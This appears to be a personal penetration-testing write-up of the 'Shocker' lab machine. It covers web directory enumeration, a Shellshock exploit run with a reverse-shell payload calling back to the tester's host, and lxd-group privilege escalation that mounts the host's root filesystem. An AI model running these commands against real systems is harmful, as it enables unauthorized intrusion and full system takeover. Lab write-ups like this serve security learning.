Monty's Pentesting Notes | Obsidian

    Shocker

    nmap scan reveals port 80 apache web server; port 2222 ssh

    a directory scan of the web server reveals /cgi-bin/

    > gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
<SNIP>
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
<SNIP>

    a /cgi-bin/ directory typically indicates that the server is running Common Gateway Interface (CGI) scripts, which are used to execute dynamic content on the server.

    Thus, next step should be directory traverse /cgi-bin/ with common script extensions such as .cgi, .sh, .pl

    gobuster dir -u http://10.10.10.56/cgi-bin/ -w 
<SNIP>
/.hta.sh              (Status: 403) [Size: 301]
/.htpasswd.pl         (Status: 403) [Size: 306]
/.htpasswd.sh         (Status: 403) [Size: 306]
/.htpasswd            (Status: 403) [Size: 303]
/.htpasswd.cgi        (Status: 403) [Size: 307]
/user.sh              (Status: 200) [Size: 119]

    here we discovered the script user.sh

    The guided mode tells me to look for an exploit in 2014, commonly known as Shellshock, and I did, and I found it. I don't know how the fuck would I have identified it if it didn't give me this hint. I really don't, but I looked at this hint and I fucking fount it.

    https://www.exploit-db.com/exploits/34900

    python2 shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.12 lport=9001 pages=/cgi-bin/user.sh

    Now I have a reverse shell.

    Upon inspecting id, I found that the user is in the lxd group

    Thus, we can leverage lxd in Linux Privilege Escalation

    first, transfer alpine.tar.gz to the target machine, then import the image

    shelly@Shocker:/tmp$ lxc image import alpine.tar.gz --alias alpine
Generating a client certificate. This may take a minute...
error: mkdir /.config: permission denied

    that's fine, we can just do this, setting HOME=/tmp allowed lxc to store its configuration in a writable directory

    shelly@Shocker:/tmp$ export HOME=/tmp
export HOME=/tmp
shelly@Shocker:~$ lxc image import alpine.tar.gz --alias alpine
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

Image imported with fingerprint: 5cfe4f7510aa3893f14e7cb0097d202d8b86ef71bf9731f68ee55e7e8808a541

    shelly@Shocker:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |          UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| alpine | 5cfe4f7510aa | no     | alpine v3.18 (20230607_12:34) | x86_64 | 3.62MB | Jan 18, 2025 at 11:35pm (UTC) |
+--------+--------------+-

    shelly@Shocker:~$ lxc init alpine r00t -c security.privileged=true

    shelly@Shocker:~$ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

    shelly@Shocker:~$ lxc start r00t

    shelly@Shocker:/mnt$ lxc exec r00t /bin/sh

    cd /mnt/root/root
cat root.txt